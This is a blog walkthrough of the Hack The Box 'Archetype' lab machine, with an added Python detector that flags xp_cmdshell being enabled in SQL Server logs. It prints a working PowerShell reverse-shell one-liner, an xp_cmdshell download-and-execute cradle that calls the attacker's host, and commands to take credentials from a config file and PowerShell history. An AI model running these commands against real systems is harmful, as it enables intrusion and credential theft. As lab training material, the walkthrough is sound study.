Starting Point Lab Machines

Emmanuel
6 min read, Feb 15, 2021

A list of hackthebox Starting Point machines for everyone who is just beginning on this platform, current as of 14 February 2021. These are the machines available to pwn.

I have known about hackthebox for about a year now, but I am not active on this site. I had an early wake-up call that I am not improving my skills these past months. I have already pwned Archetype.

Note: In the upper right there are Tutorials for all these boxes, but I find them lacking at some points. That is why I will write walkthroughs for these boxes (not all of them, but some of them).

First of all, connect to the VPN (Virtual Private Network) provided by hackthebox; see the commands below.

ch3@ch3: ls

-This command lists the files and folders in your current directory. Once you have located your .ovpn file, run the command below.

ch3@ch3: openvpn [NameOfYourVPN]

-Then press Enter and wait at least 15 seconds for the command to process. Once done you will see "Initialization Sequence Completed". You can now proceed to the hackthebox platform.

Walkthrough Archetype:
Name: Archetype
OS: Windows
IP: 10.10.10.27

Enumeration is the key. Let us use Nmap (Network Mapper). I used this format since I am not familiar with the Nmap commands yet; you can use other parameters if you want, as long as they give you meaningful insight into the machine.

We can now see the open ports and services. We can attack SMB (Server Message Block, on port 445) and Microsoft SQL Server 2017. Let us take a look at SMB and Microsoft SQL Server.

Let us check whether SMB permits anonymous access to any share, since shares often store configuration files or other sensitive information.

smbclient -N -L \\\\10.10.10.27
smbclient -N \\\\10.10.10.27\\backups

The first command lists the shares without a password (-N) and shows a share named backups; the second connects to it. Let’s take a peek at what’s inside.

There is a configuration file named “prod.dtsConfig”. Let us retrieve it and see what the configuration settings are. Enter the command below (inside the smbclient session) to get the file.

get prod.dtsConfig

Locate the file “prod.dtsConfig” on your machine. To view its contents (the configuration settings), enter the command below.

cat prod.dtsConfig

// The DTS configuration file, included in this walkthrough

<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="…" GeneratedFromPackageName="…" GeneratedFromPackageID="…" GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>

As you can see, the connection string in the configuration contains the value User ID=ARCHETYPE\sql_svc, together with its password. We can use a tool named Impacket; download it here (https://github.com/SecureAuthCorp/impacket).

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1–3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

Download the tool using the terminal (the exact steps will depend on your Linux distro; in this walkthrough I am using a Debian-based one). Enter the command below.

git clone https://github.com/SecureAuthCorp/impacket.git

Copy and paste the HTTPS link shown under the HTTPS tab on GitHub.

Once the download is done, update your Kali Linux and install the Python dependencies. See the screenshots below.

When all requirements are installed, you can proceed with Impacket. Go to the Impacket directory and then into examples; the Python scripts are in the examples directory.

python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

A password will be required for this; it is the password shown in the DTSConfiguration.

It’s okay not to succeed at the first try; try again, and if it does not work after a few attempts, check the command you entered and the password as well. The error may come from either of these.

The IS_SRVROLEMEMBER function reveals whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. Check for membership in the sysadmin role.

“xp_cmdshell” is an extended stored procedure provided by Microsoft and stored in the master database. Note that the account we are running as does not have administrative privileges on this host.
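A defender-side counterpart to the xp_cmdshell step, added here and not part of the original post: turning xp_cmdshell on through sp_configure writes "Configuration option 'xp_cmdshell' changed from 0 to 1" lines to the SQL Server ERRORLOG, so a detection can alert on that transition and replay the log to see whether the option was left enabled. The log lines below are constructed samples in the standard ERRORLOG layout (timestamp, spid, message), which this example assumes.

```python
import re
from datetime import datetime

# Constructed lines in the SQL Server ERRORLOG layout (timestamp, spid, message);
# they are not taken from the box.
SAMPLE_ERRORLOG = """\
2021-02-14 10:01:30.10 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-02-14 10:01:31.22 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-02-14 10:05:02.00 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2021-02-14 10:05:03.01 spid12      Starting up database 'Catalog'.
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>\S+)\s+(?P<msg>.*)$")
CONFIG_RE = re.compile(r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
# sp_configure options that grant OS-level or cross-server execution from T-SQL
DANGEROUS_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}

def parse_config_changes(text):
    """Extract every 'Configuration option ... changed' event from ERRORLOG text."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        c = CONFIG_RE.search(m["msg"]) if m else None
        if not c:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
            "spid": m["spid"],
            "option": c["option"],
            "old": int(c["old"]),
            "new": int(c["new"]),
        })
    return events

def dangerous_enables(events):
    """Events worth alerting on: a dangerous option flipped from off to on."""
    return [e for e in events
            if e["option"] in DANGEROUS_OPTIONS and e["old"] == 0 and e["new"] != 0]

def still_enabled(events):
    """Replay changes in time order to learn which dangerous options remain on."""
    state = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["option"] in DANGEROUS_OPTIONS:
            state[e["option"]] = e["new"] != 0
    return {opt for opt, on in state.items() if on}
```

The spid in each alert lets the responder join the event to the session and login that issued sp_configure in the server's own audit or session logs.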

Let’s use another method to get a shell on this machine: a PowerShell reverse shell.

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Change the IP address above (10.x.x.x) to the IP assigned to you by hackthebox. To check which IP hackthebox assigned you, see the command below.

ifconfig tun0

Whatever IP is shown next to inet (IPv4) is the IP you will use in your PowerShell script. Let us proceed to the next steps of this walkthrough.

Open nano or vim and save the one-liner to a file. Save it as a PowerShell script; see mine.

Open a mini web server to host the script.
python3 -m http.server 80

Connection is established.

Open a netcat listener.
nc -lvnp 443

Connection is established.

Enter the command below (inside the mssqlclient session), but change the IP address to the one assigned to you and use the name of the PowerShell file you created.

xp_cmdshell "powershell "IEX(New-Object Net.WebClient).DownloadString(\"http://YourIPGivenByTheHTB/NameOfYourPowershell\");"

Once the SQL server has connected back, check your netcat listener. From the netcat shell you can start to dig deeper into the machine.

Enter the entire command below to check the PowerShell history for the creds of Archetype\backups.

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

We can escalate privileges with psexec. See the screenshot above, where a leaked credential was found.

python3 psexec.py administrator@10.10.10.27

Then enter the leaked password.

Find directories and files with the dir command (it lists directories and files on Windows).

And lastly, read the flag with type root.txt. Good luck, and I CONGRATULATE YOU for reaching this point.
